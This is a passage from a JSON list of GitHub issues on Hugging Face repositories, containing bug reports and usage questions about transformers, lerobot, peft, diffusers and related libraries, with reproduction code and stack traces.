v2. \n\n### Your contribution\n\nImplement Lily, repo: https://github.com/yibozhong/lily. ", "url": "https://github.com/huggingface/peft/issues/2563", "state": "closed", "labels": [], "created_at": "2025-06-02T07:23:30Z", "updated_at": "2025-12-18T14:03:32Z", "comments": 15, "user": "yibozhong" }, { "repo": "huggingface/lerobot", "number": 1180, "title": "dataset training", "body": "How many episodes do you recommend making for each file when learning the dataset? Can I create about 400 episodes by putting different tasks in each episode? Or can I create the same task data for each file and combine multiple files?", "url": "https://github.com/huggingface/lerobot/issues/1180", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-06-01T15:59:47Z", "updated_at": "2025-10-08T12:54:48Z", "user": "bruce577" }, { "repo": "huggingface/lerobot", "number": 1177, "title": "[Question] Why use a kernel device for IP cameras?", "body": "I'm wondering why, when we have an IP camera (by using DroidCam on Android, for instance), the team decided to plug the IP camera into a loopback device in `/dev/videoX` instead of directly reading the video stream in the code with OpenCV `cv2.VideoCapture(url)`. I understand doing this allows controlling FPS & resolution, which is not possible when `cv2.VideoCapture(url)` is used directly; however, the downside is that you need to map the camera to a kernel device, which becomes really cumbersome, especially when you need root access and when the device gets stuck in a weird state.\n\nWhy didn't the team simply read the video stream from `cv2.VideoCapture(url)` and then downsize the video stream inside the code loop? 
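Something like the following is what I have in mind; a minimal sketch, where the stream URL and target resolution are placeholders:\n\n```python\nimport cv2\n\n# Hypothetical DroidCam-style endpoint; placeholder URL, not a real device.\ncap = cv2.VideoCapture(\"http://192.168.0.10:4747/video\")\nwhile True:\n    ok, frame = cap.read()  # frames arrive at whatever FPS/resolution the stream provides\n    if not ok:\n        break\n    frame = cv2.resize(frame, (640, 480))  # downsize in the loop instead of via a kernel device\n    # ... hand `frame` to the rest of the pipeline ...\ncap.release()\n```\n\n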
(The only downside of doing this I found is that we can't get 30fps if the stream outputs only 25fps but this shouldn't be a problem imo since `OpenCVCamera.read_loop` adds a 0.1 latency which messes up the fps sync anyways).", "url": "https://github.com/huggingface/lerobot/issues/1177", "state": "closed", "labels": [ "question", "robots", "stale" ], "created_at": "2025-05-31T05:24:21Z", "updated_at": "2025-12-31T02:35:18Z", "user": "godardt" }, { "repo": "huggingface/transformers", "number": 38501, "title": "torch.compile fails for gemma-3-1b-it", "body": "### System Info\n\n- `transformers` version: 4.52.4\n- Platform: Linux-6.15.0-1-MANJARO-x86_64-with-glibc2.41\n- Python version: 3.12.8\n- Huggingface_hub version: 0.32.3\n- Safetensors version: 0.5.3\n- Accelerate version: 1.7.0\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.7.0+cu126 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: no\n- Using GPU in script?: yes\n- GPU type: NVIDIA GeForce RTX 3090 Ti\n\n### Who can help?\n\n@ArthurZucker @gante \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nRunning `TORCHDYNAMO_VERBOSE=1 TORCH_LOGS=\"+dynamo\" uv run main.py` fails:\n\n
\nMinimal reproducible example\n\n```python\nimport torch\nfrom transformers import GemmaTokenizer, Gemma3ForCausalLM\n\n\nckpt = \"google/gemma-3-1b-it\"\nmodel = Gemma3ForCausalLM.from_pretrained(\n ckpt,\n device_map=\"cuda:0\",\n torch_dtype=torch.bfloat16,\n)\nprocessor = GemmaTokenizer.from_pretrained(ckpt)\n\n\nmessages = [{\"role\": \"user\", \"content\": \"What is 2^7-2^4??\"}]\ninputs = processor.apply_chat_template(\n messages,\n add_generation_prompt=True,\n tokenize=True,\n return_dict=True,\n return_tensors=\"pt\",\n).to(model.device)\n\n\ninput_len = inputs[\"input_ids\"].shape[-1]\n\n\n# generate_fn = model.generate\n\ngenerate_fn = torch.compile(model.generate, fullgraph=True)\n\ngeneration = generate_fn(**inputs, max_new_tokens=100, do_sample=False)\ngeneration = generation[0][input_len:]\n\n\ndecoded = processor.decode(generation, skip_special_tokens=True)\nprint(decoded)\n```\n\n
\n\n
\nStack trace\n\nFull paste: https://pastebin.com/V103pCWM\n\n```\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/torch/_dynamo/variables/builtin.py\", line 2111, in call_deepcopy\n unimplemented(f\"copy.deepcopy {repr(x)}\")\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/torch/_dynamo/exc.py\", line 439, in unimplemented\n raise Unsupported(msg, case_name=case_name)\ntorch._dynamo.exc.Unsupported: copy.deepcopy UserDefinedObjectVariable(GenerationConfig)\n\nfrom user code:\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/torch/_dynamo/external_utils.py\", line 70, in inner\n return fn(*args, **kwargs)\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/transformers/generation/utils.py\", line 2354, in generate\n generation_config, model_kwargs = self._prepare_generation_config(\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/transformers/generation/utils.py\", line 1744, in _prepare_generation_config\n generation_config = copy.deepcopy(generation_config)\n\n```\n\n
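As a possible workaround (a sketch I have not verified for Gemma 3): compiling the model's `forward` instead of `generate` keeps `copy.deepcopy(GenerationConfig)` out of the traced graph, since `generate` then runs eagerly and only the forward pass is compiled:\n\n```python\n# Unverified sketch: compile only the forward pass; generate() runs eagerly\n# and calls the compiled forward, so _prepare_generation_config is never traced.\nmodel.forward = torch.compile(model.forward, fullgraph=True)\ngeneration = model.generate(**inputs, max_new_tokens=100, do_sample=False)\n```\n\n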
\n\n### Expected behavior\n\nCompilation proceeds", "url": "https://github.com/huggingface/transformers/issues/38501", "state": "closed", "labels": [ "bug" ], "created_at": "2025-05-30T21:01:41Z", "updated_at": "2025-06-02T20:45:54Z", "comments": 6, "user": "InCogNiTo124" }, { "repo": "huggingface/transformers", "number": 38500, "title": "Unable to deploy Gemma 3 on AWS SageMaker due to lack of support in transformers release", "body": "Hi,\n\nIt seems when I deploy the model\n\n```\nhuggingface_model = HuggingFaceModel(\n model_data=model_s3_uri, \n role=role,\n transformers_version=\"4.49.0\", \n pytorch_version=\"2.6.0\",\n py_version=\"py312\",\n)\n\npredictor = huggingface_model.deploy(\n instance_type=\"ml.g5.48xlarge\",\n initial_instance_count=1,\n endpoint_name=\"gemma-27b-inference\",\n container_startup_health_check_timeout=900\n)\n\nresponse = predictor.predict({\n \"inputs\": \"what can i do?\"\n})\nprint(response)\n```\n\n```\nModelError: An error occurred (ModelError) when calling the InvokeEndpoint operation: Received client error (400) \nfrom primary with message \"{\n \"code\": 400,\n \"type\": \"InternalServerException\",\n \"message\": \"The checkpoint you are trying to load has model type gemma3_text but Transformers does not \nrecognize this architecture. This could be because of an issue with the checkpoint, or because your version of \nTransformers is out of date.\\n\\nYou can update Transformers with the command pip install --upgrade transformers.\n```\n\nNow I know HuggingFaceModel doesn't support anything above 4.49.0, so if I try to use 4.50.0 it will give an error saying to please use that version. The thing is, gemma3 is not available in 4.49, so how do I fix this? I have the model trained in my bucket; I just can't deploy it due to the transformers versions. Is there a way to override the container inside HuggingFaceModel so that it takes a more recent transformers?\n\nI did this, but the issue now is in SageMaker, because I cannot use this for the huggingface version as it doesn't support it:\npip install git+https://github.com/huggingface/transformers@v4.49.0-Gemma-3", "url": "https://github.com/huggingface/transformers/issues/38500", "state": "closed", "labels": [], "created_at": "2025-05-30T17:10:22Z", "updated_at": "2025-07-08T08:02:37Z", "comments": 2, "user": "ehrun32" }, { "repo": "huggingface/transformers", "number": 38499, "title": "ModernBERT for MLM outputs incorrect hidden state shape.", "body": "### System Info\n\nWhen using `ModernBertForMaskedLM` with `output_hidden_states=True` the hidden state is not correctly padded when it is returned. 
A minimal example is included below:\n\n```\nimport torch\nfrom transformers import AutoTokenizer, ModernBertForMaskedLM\n\ntokenizer = AutoTokenizer.from_pretrained(\"answerdotai/ModernBERT-base\")\nmodel = ModernBertForMaskedLM.from_pretrained(\"answerdotai/ModernBERT-base\").to(\"cuda\")\n\ninputs = tokenizer(\n [\n \"The capital of France is .\",\n \"The name of the first president of the united states is .\",\n ],\n padding=True,\n return_tensors=\"pt\",\n).to(\"cuda\")\n\nwith torch.no_grad():\n outputs = model(**inputs, output_hidden_states=True)\n\nprint(inputs[\"attention_mask\"].sum())\n# >>> 26\nprint(outputs.hidden_states[-1].shape)\n# >>> torch.Size([26, 768])\n\n\nassert outputs.hidden_states[-1].shape == inputs[\"input_ids\"].shape + (\n model.config.hidden_size,\n)\n```\n\nI'm using the following library versions:\n- `transformers==4.48.2`\n- `torch==2.6.0`\n\nIt appears that what is returned is the flattened version as the tensor is 2D and the first dimension corresponds to the sum of the attention mask. This issue doesn't happen when using the non MLM version.\n\nI searched modern bert and hidden state and looked at the recent commits and didn't see any mention of this issue, but it might have been fixed in a newer version without it being obvious.\n\n\n\n### Who can help?\n\n@ArthurZucker \n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nRun the code provided in the issue with flash attention on a Cuda GPU.\n\n### Expected behavior\n\nThe hidden states should have shape [batch size, max sequence length, model dim] but they have shape [unknown dim (I think the number of unpadded tokens), model dim].", "url": "https://github.com/huggingface/transformers/issues/38499", "state": "closed", "labels": [ "bug" ], "created_at": "2025-05-30T17:02:55Z", "updated_at": "2025-07-08T08:02:39Z", "comments": 2, "user": "jfkback" }, { "repo": "huggingface/lerobot", "number": 1174, "title": "[Question] Multi-Rate Sensor and Discrete Event Handling in `lerobot`", "body": "Hello `lerobot` Team,\n\nFirst off, huge thanks for building such an awesome open-source project!\n\nI'm currently exploring `lerobot` for a project and have some critical questions regarding its data handling, specifically for multi-rate sensors and discrete events. My understanding from the README is that `lerobot` records at a fixed `fps`, creating a table with `fps * record_time` rows.\n\nThis leads to two primary concerns:\n\n1. **Multi-Rate Sensors:**\n Consider a sensor like an IMU operating at 1KHz, while other sensors might be at much lower rates. To capture the IMU data without loss, the `fps` would need to be set extremely high, to match highest-rate-sensor. This implies:\n * **Massive Data Redundancy:** A significant portion of rows would contain sparse information from the lower-rate sensors.\n * **Recording Performance:** Could such a high `fps` and resulting data volume negatively impact recording performance, potentially making it infeasible to capture this type of data?\n * **Storage Load:** This approach would also lead to very large dataset sizes.\n Am I correct in this interpretation? If so, how does `lerobot` effectively manage multi-rate sensor data to mitigate these issues?\n\n2. 
**Discrete Events:**\n How are discrete events, such as keyboard presses/releases or joystick button presses, recorded into a `LeRobotDataset`? The current design of `LeRobotDataset`, particularly `__nextitem__` and `delta_timestamps`, seems to implicitly assume continuous data that can be interpolated. How does `lerobot` accommodate and represent these non-continuous, event-driven data points within its framework?\n\nA quick response addressing these points would be incredibly helpful for our ongoing development.\n\nThanks for your time and insight!", "url": "https://github.com/huggingface/lerobot/issues/1174", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-05-30T09:04:13Z", "updated_at": "2025-12-17T10:44:46Z", "user": "MilkClouds" }, { "repo": "huggingface/transformers", "number": 38489, "title": "VLM reverse mapping logic in modeling_utils.py save_pretrained not doing anything?", "body": "### System Info\n\ntransformers version: 4.52.3\nPlatform: Ubuntu 24.04\nPython version: 3.11.0\nHuggingface_hub version: 0.32.2\nSafetensors version: 0.5.3\nAccelerate version: 1.7.0\nAccelerate config: not found\nDeepSpeed version: not installed\nPyTorch version (GPU?): 2.7.0+cu126 (H100)\nTensorflow version (GPU?): not installed (NA)\nFlax version (CPU?/GPU?/TPU?): not installed (NA)\nJax version: not installed\nJaxLib version: not installed\nUsing distributed or parallel set-up in script?: No\nUsing GPU in script?: No\nGPU type: NVIDIA H100\n\n### Who can help?\n\n@amyeroberts @zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nborrowing the reverse key mapping logic in the modeling_utils.py save_pretrained method as shown here:\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/modeling_utils.py#L3649\nIf we also use the qwen2 model mappings for Qwen2ForConditionalGeneration as an example\nand a sample of keys as shown below to test the reversal logic:\n\n```\nimport re\nfrom transformers import Qwen2VLForConditionalGeneration\ncheckpoint_conversion_mapping = Qwen2VLForConditionalGeneration._checkpoint_conversion_mapping\n\ncheckpoint_keys = [\n 'model.language_model.layers.9.post_attention_layernorm.weight', # Should be remapped\n 'model.layers.9.self_attn.k_proj.bias', # Should not be remapped\n 'model.visual.blocks.0.attn.proj.bias', # Should be remapped\n 'visual.blocks.0.attn.proj.weight', # Should not be remapped\n]\n\nreverse_key_mapping = {v: k for k, v in checkpoint_conversion_mapping.items()}\nfor key in checkpoint_keys:\n print(f\"\\nOperating on sample key: {key}:\")\n for pattern, replacement in reverse_key_mapping.items():\n replacement = replacement.lstrip(\"^\") # strip off un-needed chars and patterns\n replacement = re.sub(r\"\\(.*?\\)\", \"\", pattern)\n key, n_replace = re.subn(pattern, replacement, key)\n print(f\"pattern: {pattern}, replacement: {replacement}, resultant key: {key}\")\n # Early exit of the loop\n if n_replace > 0:\n print(f\"Result: final mapped key is {key}\")\n break\n else:\n print(f\"Result: no mappings performed\")\n```\nreturns the following output where no mapping reversal is performed where it should be.\n```\nOperating on sample key: model.language_model.layers.9.post_attention_layernorm.weight:\npattern: model.visual, replacement: model.visual, resultant key: 
model.language_model.layers.9.post_attention_layernorm.weight\nResult: no mappings performed\npattern: model.language_model, replacement: model.language_model, resultant key: model.language_model.layers.9.post_attention_layernorm.weight\nResult: final mapped key is model.language_model.layers.9.post_attention_layernorm.weight\n\nOperating on sample key: model.layers.9.self_attn.k_proj.bias:\npattern: model.visual, replacement: model.visual, resultant key: model.layers.9.self_attn.k_proj.bias\nResult: no mappings performed\npattern: model.language_model, replacement: model.language_model, resultant key: model.layers.9.self_attn.k_proj.bias\nResult: no mappings performed\n\nOperating on sample key: model.visual.blocks.0.attn.proj.bias:\npattern: model.visual, replacement: model.visual, resultant key: model.visual.blocks.0.attn.proj.bias\nResult: final mapped key is model.visual.blocks.0.attn.proj.bias\n\nOperating on sample key: visual.blocks.0.attn.proj.weight:\npattern: model.visual, replacement: model.visual, resultant key: visual.blocks.0.attn.proj.weight\nResult: no mappings performed\npattern: model.language_model, replacement: model.language_model, resultant key: visual.blocks.0.attn.proj.weight\nResult: no mappings performed\n```\n\n### Expected behavior\n\nThe expected behavior should be such that we observe the following mapping:\n```\nmodel.language_model.layers.9.post_attention_layernorm.weight -> model.layers.9.post_attention_layernorm.weight\nmodel.visual.blocks.0.attn.proj.bias -> visual.blocks.0.attn.proj.bias\nmodel.layers.9.self_attn.k_proj.bias -> model.layers.9.self_attn.k_proj.bias (remains the same)\nvisual.blocks.0.attn.proj.weight -> visual.blocks.0.attn.proj.weight (remains the same)\n```\n\nThis could be achieved by changing the reversal code inside the `for pattern, replacement in reverse_key_mapping.items():` loop to be \n```\nreplacement = replacement.lstrip(\"^\") # strip off un-needed chars and patterns\n replacement = re.sub(r\"\\^?([^(?]+).*\", r\"\\1\", replacement)\n key, n_replace = re.subn(pattern, replacement, key)\n print(f\"pattern: {pattern}, replacement: {replacement}, resultant key: {key}\")\n # Early exit of the loop\n if n_replace > 0:\n break\n``` \ninstead.\n\nI could ", "url": "https://github.com/huggingface/transformers/issues/38489", "state": "closed", "labels": [ "bug" ], "created_at": "2025-05-30T08:55:57Z", "updated_at": "2025-05-30T13:08:58Z", "comments": 6, "user": "rolandtannous" }, { "repo": "huggingface/diffusers", "number": 11637, "title": "How to load LoRA weights in distributed applications?", "body": "If I want to use xDiT with 2 GPUs to run inference with FluxControlPipeline, how should I do it?\n\nI wrote an xFuserFluxControlPipeline class, but it cannot load LoRA weights the right way: with xFuserFluxTransformer, one GPU has some of the parameters and the other GPU has the others.\nWhat should I do?", "url": "https://github.com/huggingface/diffusers/issues/11637", "state": "open", "labels": [], "created_at": "2025-05-30T07:14:50Z", "updated_at": "2025-06-03T10:15:51Z", "user": "Johnson-yue" }, { "repo": "huggingface/peft", "number": 2558, "title": "GraLoRA support?", "body": "### Feature request\n\nWill the library support the [GraLoRA](https://arxiv.org/abs/2505.20355) technique?\n\n### Motivation\n\nGraLoRA addresses a fundamental limitation of LoRA: overfitting when the bottleneck is widened.\n\nThe technique seems to more closely approximate full fine-tuning; hybrid GraLoRA gets the best of both worlds, with LoRA benefiting from low-rank scenarios (16 or 
less) and GraLoRA from high-rank scenarios (16 to 128).\n\nThe authors have a modified peft library; it would be nice to have support in the official library.\n\n### Your contribution\n\nI have limited time for the next two weeks. Then, I will be able to contribute.\n\nBut it should be very easy for the authors to port the implementation; most of it is in the [gralora](https://github.com/SqueezeBits/GraLoRA/tree/8dff8438c80969f5f11f23249fed62aac9d687e8/peft/src/peft/tuners/gralora) sub-package.", "url": "https://github.com/huggingface/peft/issues/2558", "state": "closed", "labels": [], "created_at": "2025-05-29T18:36:27Z", "updated_at": "2025-07-15T15:04:20Z", "comments": 10, "user": "DiTo97" }, { "repo": "huggingface/lerobot", "number": 1171, "title": "sync_read.py", "body": "Hi, I am currently testing the functions in the STServo_Python folder to work with my STS3215 motors. When I run the sync_read.py script, I encounter an issue caused by the addParam(self, sts_id) function returning False. I tried several things, but I can't get past the error.\nI made sure that the motor IDs are correct and that the motors are connected and powered. I'm using a GroupSyncRead object with a start_address of SCSCL_PRESENT_POSITION_L and data_length of 4. Still, addParam() fails, and the motor ID is not added to the list.\n\nDoes anyone know why this is happening or how to fix it?\n\nThanks in advance!", "url": "https://github.com/huggingface/lerobot/issues/1171", "state": "closed", "labels": [ "bug", "question", "robots", "stale" ], "created_at": "2025-05-29T15:33:16Z", "updated_at": "2025-12-31T02:35:19Z", "user": "Baptiste-le-Beaudry" }, { "repo": "huggingface/candle", "number": 2974, "title": "Any good first issues a newcomer could tackle?", "body": "Hey! I've been using this crate for a while now and would love to start contributing back! I notice that your issues aren't labelled; who should I contact, or do you have a list of issues that would be good for me?", "url": "https://github.com/huggingface/candle/issues/2974", "state": "open", "labels": [], "created_at": "2025-05-29T04:19:18Z", "updated_at": "2025-05-30T18:25:37Z", "comments": 3, "user": "Heidar-An" }, { "repo": "huggingface/xet-core", "number": 358, "title": "How can I make snapshot_download resume after errors? Errors became very common", "body": "Whenever some error happens and I run the same code, it starts from 0.\n\nIt is a XET-enabled repo and hf_xet is installed.\n\nI really need to have a resume feature.\n\nMy entire code:\n\n\n```\nfrom huggingface_hub import snapshot_download\nimport os\nimport argparse\n\ndef download_models(target_dir=None):\n \"\"\"\n Download models from HuggingFace hub to specified directory\n \n Args:\n target_dir (str, optional): Target directory for downloads. 
\n If None, uses current working directory\n \"\"\"\n # Set repo ID\n repo_id = \"MonsterMMORPG/Kohya_Train\"\n \n # Use provided target dir or default to current working directory\n download_dir = target_dir if target_dir else os.getcwd()\n \n # Create target directory if it doesn't exist\n os.makedirs(download_dir, exist_ok=True)\n \n try:\n snapshot_download(\n local_dir=download_dir,\n repo_id=repo_id\n )\n print(f\"\\nDOWNLOAD COMPLETED to: {download_dir}\")\n print(\"Check folder content for downloaded files\")\n \n except Exception as e:\n print(f\"Error occurred during download: {str(e)}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Download models from HuggingFace hub')\n parser.add_argument('--dir', type=str, help='Target directory for downloads', default=None)\n \n args = parser.parse_args()\n download_models(args.dir)\n```", "url": "https://github.com/huggingface/xet-core/issues/358", "state": "closed", "labels": [ "enhancement" ], "created_at": "2025-05-28T22:30:19Z", "updated_at": "2025-11-20T17:08:35Z", "user": "FurkanGozukara" }, { "repo": "huggingface/transformers", "number": 38452, "title": "Memory saving by upcasting logits for only non-ignored positions", "body": "### Feature request\n\nIn [`loss_utils.py`](https://github.com/huggingface/transformers/blob/main/src/transformers/loss/loss_utils.py), logits are upcasted for float32 for some losses. This can waste memory for cases where certain labels are `ignore_index`. This is especially true for fine tuning cases where one chooses to calculate loss only on the completion. They would keep label as -100 for prompt tokens and upcasting those logits would be unnecessary. We can instead call `logits.float()` after we have our final labels. This would be especially useful for `ForCausalLMLoss` as that seems to be the most likely use case.\n\n### Motivation\n\nWhen fine tuning a causal LM, one can choose to calculate loss only on the completion, thus setting labels for prompt tokens to be -100. Upcasting logits at those positions when calculating loss is not needed. Avoiding that can save memory. Most likely use case is `ForCausalLMLoss`.\n\n### Your contribution\n\nAn example for `ForCausalLMLoss`:\n\n```\ndef ForCausalLMLoss(\n logits,\n labels,\n vocab_size: int,\n num_items_in_batch: Optional[int] = None,\n ignore_index: int = -100,\n shift_labels: Optional[torch.Tensor] = None,\n **kwargs,\n) -> torch.Tensor:\n # Don't upcast yet\n # logits = logits.float()\n\n if shift_labels is None:\n # Shift so that tokens < n predict n\n labels = nn.functional.pad(labels, (0, 1), value=ignore_index)\n shift_labels = labels[..., 1:].contiguous() \n\n # Flatten the tokens\n logits = logits.view(-1, vocab_size)\n shift_labels = shift_labels.view(-1)\n\n # Upcast to float if we need to compute the loss to avoid potential precision issues\n # Now that we have our final labels, take only the useful logits and then upcast\n logits = logits[shift_labels != ignore_index]\n shift_labels = shift_labels[shift_labels != ignore_index]\n logits = logits.float()\n\n # Enable model parallelism\n shift_labels = shift_labels.to(logits.device)\n\n # Calculate loss on truncated logits and labels\n loss = fixed_cross_entropy(logits, shift_labels, num_items_in_batch, ignore_index, **kwargs)\n return loss\n```\n\nWe can do something similar in `ForMaskedLMLoss` on line 83 instead of 77. 
`ForTokenClassification` does not take `ignore_index` as an argument but we can still do the same here because `fixed_cross_entropy` does take `ignore_index`.\n\nAnother alternative was to move the upcasting to inside `fixed_cross_entropy` but a few losses don't do that. So, that might change/break existing things.\n\nLet me know if this change sounds good. I can submit a PR.", "url": "https://github.com/huggingface/transformers/issues/38452", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-05-28T18:58:52Z", "updated_at": "2025-05-29T12:38:15Z", "comments": 1, "user": "harshit2997" }, { "repo": "huggingface/speech-to-speech", "number": 163, "title": "how to use this with Livekit Agent?", "body": "how to use this with Livekit Agent?", "url": "https://github.com/huggingface/speech-to-speech/issues/163", "state": "open", "labels": [], "created_at": "2025-05-28T18:27:11Z", "updated_at": "2025-05-28T18:27:11Z", "user": "Arslan-Mehmood1" }, { "repo": "huggingface/transformers", "number": 38448, "title": "num_items_in_batch larger than the actual useful token when computing loss", "body": "def fixed_cross_entropy(source, target, num_items_in_batch: int = None, ignore_index: int = -100, **kwargs):\nI check the shape of the inputs and find follows:\nIn [1]: logits.shape\nOut[1]: torch.Size([4, 896, 152064])\n\nIn [2]: labels.shape\nOut[2]: torch.Size([4, 896])\n\nIn [3]: num_items_in_batch\nOut[3]: 4390\n\nWhy is 4390>4*896?", "url": "https://github.com/huggingface/transformers/issues/38448", "state": "closed", "labels": [], "created_at": "2025-05-28T15:28:05Z", "updated_at": "2025-05-31T02:30:07Z", "comments": 4, "user": "SHIFTTTTTTTT" }, { "repo": "huggingface/transformers", "number": 38435, "title": "[i18n-ro] Translating docs to Romanian", "body": "Hi!\n\nLet's bring the documentation to all the Romanian-speaking community \ud83c\udf10 \n\nWho would want to translate? Please follow the \ud83e\udd17 [TRANSLATING guide](https://github.com/huggingface/transformers/blob/main/docs/TRANSLATING.md). Here is a list of the files ready for translation. Let us know in this issue if you'd like to translate any, and we'll add your name to the list.\n\nSome notes:\n\n* Please translate using an informal tone (imagine you are talking with a friend about transformers \ud83e\udd17).\n* Please translate in a gender-neutral way.\n* Add your translations to the folder called `` inside the [source folder](https://github.com/huggingface/transformers/tree/main/docs/source).\n* Register your translation in `/_toctree.yml`; please follow the order of the [English version](https://github.com/huggingface/transformers/blob/main/docs/source/en/_toctree.yml).\n* Once you're finished, open a pull request and tag this issue by including #issue-number in the description, where issue-number is the number of this issue. 
Please ping @stevhliu for review.\n* \ud83d\ude4b If you'd like others to help you with the translation, you can also post in the \ud83e\udd17 [forums](https://discuss.huggingface.co/).\n\n## Get Started section\n\n- [ ] [index.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/index.md) (in progress, [see](https://github.com/zero-point/transformers/tree/add_ro_translation_to_readme))\n- [ ] [quicktour.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/quicktour.md) \n- [ ] [installation.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/installation.md).\n\n## Tutorial section\n- [ ] [pipeline_tutorial.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/pipeline_tutorial.md)\n- [ ] [autoclass_tutorial.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/autoclass_tutorial.md)\n- [ ] [preprocessing.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/preprocessing.md)\n- [ ] [training.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/training.md)\n- [ ] [accelerate.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/accelerate.md)\n- [ ] [model_sharing.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/model_sharing.md)\n- [ ] [multilingual.md](https://github.com/huggingface/transformers/blob/main/docs/source/en/multilingual.md)\n\n\n", "url": "https://github.com/huggingface/transformers/issues/38435", "state": "open", "labels": [ "WIP" ], "created_at": "2025-05-28T12:01:48Z", "updated_at": "2025-05-28T15:53:39Z", "comments": 2, "user": "zero-point" }, { "repo": "huggingface/transformers", "number": 38428, "title": "[Question] The logic of data sampler in data parallel.", "body": "Hi, thanks for your attention.\n\nWhen reading the source code of transformers, I cannot understand the implementation of `_get_train_sampler` in `trainer.py`. Why the default data sampler is `RandomSampler` rather than `DistributedSampler`? How does the trainer handle the sampler for data parallel?\n\nreference code: https://github.com/huggingface/transformers/blob/main/src/transformers/trainer.py#L975", "url": "https://github.com/huggingface/transformers/issues/38428", "state": "closed", "labels": [], "created_at": "2025-05-28T08:49:13Z", "updated_at": "2025-07-06T08:02:36Z", "comments": 3, "user": "kxzxvbk" }, { "repo": "huggingface/transformers", "number": 38425, "title": "Can not load TencentBAC/Conan-embedding-v2", "body": "### System Info\n\nDescription\nWhen attempting to load the \u201cConan-embedding-v2\u201d model directly via transformers.AutoModel.from_pretrained, I get a ValueError indicating that the repo\u2019s config.json lacks a model_type key. 
This prevents the Transformers library from inferring which model class to instantiate.\n\n\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom transformers import AutoModel\n\nmodel = AutoModel.from_pretrained(\"TencentBAC/Conan-embedding-v2\")\n\nValueError: Unrecognized model in TencentBAC/Conan-embedding-v2.\nShould have a `model_type` key in its config.json, or contain one of the following strings in its name: albert, bart, bert, \u2026, whisper, xlnet, \u2026\n\n\n### Expected behavior\n\nAutoModel.from_pretrained(\"TencentBAC/Conan-embedding-v2\") should load the model automatically, or at minimum provide guidance on how to set the correct model_type.", "url": "https://github.com/huggingface/transformers/issues/38425", "state": "closed", "labels": [ "bug" ], "created_at": "2025-05-28T08:21:23Z", "updated_at": "2025-05-28T14:58:03Z", "comments": 1, "user": "shanekao-sks" }, { "repo": "huggingface/accelerate", "number": 3596, "title": "How to distribute the model into multiple GPUs using accelerate?", "body": "I have 4 GPUs. If I only use a single GPU to train the model, there will be an OutOfMemoryError raised. How can I distribute the model into all the 4 GPUs to avoid the OutOfMemoryError using accelerate?", "url": "https://github.com/huggingface/accelerate/issues/3596", "state": "closed", "labels": [], "created_at": "2025-05-28T06:27:08Z", "updated_at": "2025-05-28T14:06:18Z", "user": "GeorgeCarpenter" }, { "repo": "huggingface/candle", "number": 2971, "title": "Enhance the usability of the tensor struct", "body": "Hello,\n\nI\u2019m currently learning how to use Candle with the book Dive into Deep Learning, but implementing the code in Candle. I noticed that Candle is missing some practical utility functions, such as:\n\n* The Frobenius norm \n* dot product (vector or matrix dot product)\n* matrix-vector multiplication\n\nWhile these functions aren\u2019t overly complex to implement manually, having them natively supported by the Tensor struct would significantly improve usability.\n\nI\u2019ve tried adding some of these functions myself to extend Candle\u2019s functionality (to make it more user-friendly). 
", "url": "https://github.com/huggingface/candle/issues/2971", "state": "closed", "labels": [], "created_at": "2025-05-28T03:41:44Z", "updated_at": "2025-05-29T07:41:02Z", "comments": 1, "user": "ssfdust" }, { "repo": "huggingface/transformers.js", "number": 1323, "title": "Cannot get the SAM model running like in example", "body": "### Question\n\nI've found that transformers.js supports SAM as written in 2.14.0 release notes.\nhttps://github.com/huggingface/transformers.js/releases/tag/2.14.0\n\nI'm running the code on a M1 mac in a Brave browser.\n\nBut after I've used and adapted the example script, I can actually see in my browser console that the model is loaded and the browser is working.\n\n\"Image\"\n\nBut then suddenly it crashes with following error:\n\n```\ntransformers.js:11821 Uncaught Error: An error occurred during model execution: \"Missing the following inputs: input_points, input_labels.\n```\n\n**My adapted code looks like this:**\n\n````javascript\n\n// using version 3.5.1\nimport {AutoProcessor, RawImage, SamModel} from \"./node_modules/@huggingface/transformers/dist/transformers.js\";\n\nconst model = await SamModel.from_pretrained('Xenova/slimsam-77-uniform');\nconst processor = await AutoProcessor.from_pretrained('Xenova/slimsam-77-uniform');\n\nconst img_url = 'https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/corgi.jpg';\nconst raw_image = await 